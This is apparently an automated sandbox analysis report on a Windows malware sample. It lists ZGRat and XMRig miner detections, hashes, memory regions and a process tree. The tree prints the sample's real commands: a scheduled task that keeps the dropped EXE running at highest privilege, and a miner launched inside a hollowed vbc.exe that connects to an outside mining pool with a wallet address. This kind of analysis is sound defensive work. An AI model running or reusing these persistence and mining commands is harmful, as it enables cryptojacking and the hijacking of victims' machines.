Resubmissions
02-02-2024 11:51
240202-n1a66adbc3 10Analysis
-
max time kernel
120s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
02-02-2024 11:51
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20231215-en
General
-
Target
tmp.exe
-
Size
4.3MB
-
MD5
dc101ebccce8a5d7f83b4b6ae5d49178
-
SHA1
0e049dce0518d7f45077202de084610e51bc0ace
-
SHA256
458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b
-
SHA512
29749129569b804d12b4af4a2de8b3d8be104c915ac1061ce8cd8c9e33856f3e40ccc5fa121324aa5b70ce7582def95adf4c1e1a2177894ddbe10341a09b39b7
-
SSDEEP
98304:k1CxiKNDAMrWXrm+G/Mul2rq/aReDkizMeQUD1:+CxiLOUr6/Mul2rVe4iwVUD1
Malware Config
Signatures
-
Detect ZGRat V1 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp family_zgrat_v1 \ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 behavioral1/memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 -
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral1/memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 5 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp net_reactor \ProgramData\SystemPropertiesDataExecutionPrevention\.exe net_reactor C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe net_reactor behavioral1/memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp net_reactor C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe net_reactor -
Executes dropped EXE 1 IoCs
Processes:
.exepid process 2696 .exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2764 cmd.exe -
Processes:
resource yara_rule behavioral1/memory/2552-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
.exedescription pid process target process PID 2696 set thread context of 2552 2696 .exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2828 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
.exepid process 2696 .exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
tmp.exe.exevbc.exedescription pid process Token: SeDebugPrivilege 2376 tmp.exe Token: SeDebugPrivilege 2696 .exe Token: SeLockMemoryPrivilege 2552 vbc.exe Token: SeLockMemoryPrivilege 2552 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 2552 vbc.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
tmp.execmd.exe.execmd.exedescription pid process target process PID 2376 wrote to memory of 2764 2376 tmp.exe cmd.exe PID 2376 wrote to memory of 2764 2376 tmp.exe cmd.exe PID 2376 wrote to memory of 2764 2376 tmp.exe cmd.exe PID 2764 wrote to memory of 2828 2764 cmd.exe timeout.exe PID 2764 wrote to memory of 2828 2764 cmd.exe timeout.exe PID 2764 wrote to memory of 2828 2764 cmd.exe timeout.exe PID 2764 wrote to memory of 2696 2764 cmd.exe .exe PID 2764 wrote to memory of 2696 2764 cmd.exe .exe PID 2764 wrote to memory of 2696 2764 cmd.exe .exe PID 2696 wrote to memory of 2588 2696 .exe cmd.exe PID 2696 wrote to memory of 2588 2696 .exe cmd.exe PID 2696 wrote to memory of 2588 2696 .exe cmd.exe PID 2588 wrote to memory of 2728 2588 cmd.exe schtasks.exe PID 2588 wrote to memory of 2728 2588 cmd.exe schtasks.exe PID 2588 wrote to memory of 2728 2588 cmd.exe schtasks.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe PID 2696 wrote to memory of 2552 2696 .exe vbc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work2 -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\timeout.exetimeout 31⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
401KB
MD5e1a284509a6cd5f718465ebee993b028
SHA1940889ce76300988888dc58998e017a0fd726871
SHA256f1942b7533b0244b709925ab95a5b3c61724f1caa0213c8e4afd21bdb71d4fde
SHA51232de10be3e215a559dee6761933ba04043e34f81c9f6acd488afe6004de829c45dc8225c40faae89603abca6e53387bd663514ab9c6e3a2a42ded18a5907e787
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
405KB
MD5ee0ab1224b4b37861a10269da8a57f01
SHA17aebbbb8d9471898e0f24b081d90793c1ee4a826
SHA256b419a6d64bc1b7071b0064c4b831dbe8feed336ebe6ac505d4a432398434ebce
SHA51222181ebd4fed26e6f1415b343eda1c9ecfcc0ac18279ea36b2f7549b00ef6f93aa58bc98596a22a1d32d61e2c70b374508bb2e7a0f7ea9d6f9ae8c901b06c9ee
-
C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.batFilesize
168B
MD5ea3f1d3f2b8128afb86876e23163eabc
SHA1c5151eb68de092ae8f926e5f8e1e3905a09c5232
SHA256279ae97563c6d9ba63b02f7cd66713c142b2f0a7208afac0d211e9b47372a172
SHA512859177e14717c5babd076bd2166a073683e2c04cc7590052f0adc842dc50d826957f84cb126fcf4fc82988db32a1f8b8741fcc8049df6c6edc928c6ebb1a0917
-
\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
386KB
MD5de3d2a20b32c9ad0c537d5a04e447c6a
SHA164724b3978ece3f7174a0735d19de89302c0bba9
SHA256e0f3bb8ef7f9a0c1ab6301a714007e347c54bd0049a9a86d82f7bfd869dbf0f0
SHA51264d38e3e459b8a12bce2f13b9ec1b5d4d097a34d9b5b8ce7b28663b4a5a82982640874e89e86660093ad4be4b72657798123cf33893483a713f23d862e7b9ec5
-
memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmpFilesize
4.3MB
-
memory/2376-2-0x000000001C500000-0x000000001C580000-memory.dmpFilesize
512KB
-
memory/2376-3-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/2376-14-0x000007FEF5700000-0x000007FEF60EC000-memory.dmpFilesize
9.9MB
-
memory/2376-1-0x000007FEF5700000-0x000007FEF60EC000-memory.dmpFilesize
9.9MB
-
memory/2552-23-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-46-0x00000000003E0000-0x0000000000400000-memory.dmpFilesize
128KB
-
memory/2552-45-0x00000000003C0000-0x00000000003E0000-memory.dmpFilesize
128KB
-
memory/2552-25-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-26-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmpFilesize
4KB
-
memory/2552-28-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-30-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-29-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-33-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/2552-32-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-43-0x00000000003E0000-0x0000000000400000-memory.dmpFilesize
128KB
-
memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-24-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-42-0x00000000003C0000-0x00000000003E0000-memory.dmpFilesize
128KB
-
memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmpFilesize
4.3MB
-
memory/2696-20-0x000007FEF4D10000-0x000007FEF56FC000-memory.dmpFilesize
9.9MB
-
memory/2696-34-0x000007FEF4D10000-0x000007FEF56FC000-memory.dmpFilesize
9.9MB
-
memory/2696-21-0x000000001C130000-0x000000001C1B0000-memory.dmpFilesize
512KB
-
memory/2696-22-0x0000000000540000-0x0000000000541000-memory.dmpFilesize
4KB